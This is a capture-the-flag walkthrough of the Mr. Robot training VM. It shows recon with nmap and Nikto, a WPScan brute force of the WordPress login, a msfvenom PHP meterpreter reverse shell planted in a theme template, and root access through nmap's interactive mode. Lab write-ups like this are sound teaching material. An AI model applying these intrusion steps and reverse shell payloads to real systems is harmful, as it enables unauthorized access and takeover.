Mr. Robot CTF Walkthrough


To initially start this, I use netdiscover to find what the IP address of the Vm. Once I found the IP address I then use nmap to scan the open ports and services.


After the scan completes it shows the port 22, port 80 and port 443 are so I try seeing what the browser will tell us.


The webpage is very well made. We are greeted with a “Hello friend” message. Next I use Nikto.  Nikto is a web server assessment tool. It is designed to find various default and insecure files, configurations and programs on any type of web server.
Nikto –h


With the name called Mr. Robot, and also with the result in Nikto, I search the robots.txt file in the web browser.


Once opened, we see a text and dictornary file. I use wget to save the file to my PC then open to see what the results.


As we can see we have our first flag!

Now its time to see what the fsocity.dic has in store for us. 


Once opened, I see a very long list of words making it to be a wordlist of some sort. As I look through more nikto results, I notice a wp-login page. Know this is a word press site, I visit the url and prompted with a admin login page


At first for just start, I try the default user name and password admin:admin and get negative results. I did notice at the Error for invalid username. After thinking that the CTF is called Mr. Robot, I try the main character first name, Elliot. I then get results of in correct password for the user name Elliot.


I triedmany different passwords to try to get into the webpage, no luck. Next step I go for is bruteforcing the login with WPscan.
Wpscan –url –wordlist /YOUR DIRCERTORY/fsocity.dic –username Elliot


After 5 hours and 17 minutes according to the Elapsed time, I finally get the password I need to login.


Now im login and have access. Now time to make a shell to gain access further.


I make a code using msfvenom with the following commands:
msfvenom -p php/meterpreter/reverse_tcp lhost= lport=4444 -f raw
Copy the code from <?php to die(); and paste it on template(and save it)


Once uploaded in the PhP. I open metasploitto start a session.

Use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost
set lport 4444


Now after a visit to i get a meterpreter session. To obian the shell type
echo "import pty; pty.spawn('/bin/bash')" > /tmp/
python /tmp/
This now gives you access.
Using ls –las command gives access about the user information.
cd /home take you to the home folder
cd/robot takes you to the robot folder


Once I use the ls  command I see the clue for the 2nd flag. So I cat the txt file.
Cat key-2-of-3-txt
Permission denied
I was able to ls  what is inside the txt file. So I move on to the next file listed
Cat password.raw-md5
Once completed I have another clue for the flag2. It’s a md5 hash. So next I need to crack the hash. 


The value will translate to abcdefghijklmnopqrstuvwxyz
Next I get super user rights to robot
Using the translate I got from the md5 hash I have access.
I do another
Ls –lsa
Then cat the the key txt file
Cat key-2-of-3.txt
Now I have the 2nd flag


Next I use nmap interactive shell to get the 3rd and final flag.
Nmap supported an option called “interactive.” With this option, users were able to execute shell commands by using a nmap “shell” (interactive shell).
nmap –interactive
With the above commands you will enter nmap then type :
id (to know the users)
cd /root (lets you to enter root)
Once you have enetered the root, type :
ls -lsa
cat key-3-of-3.txt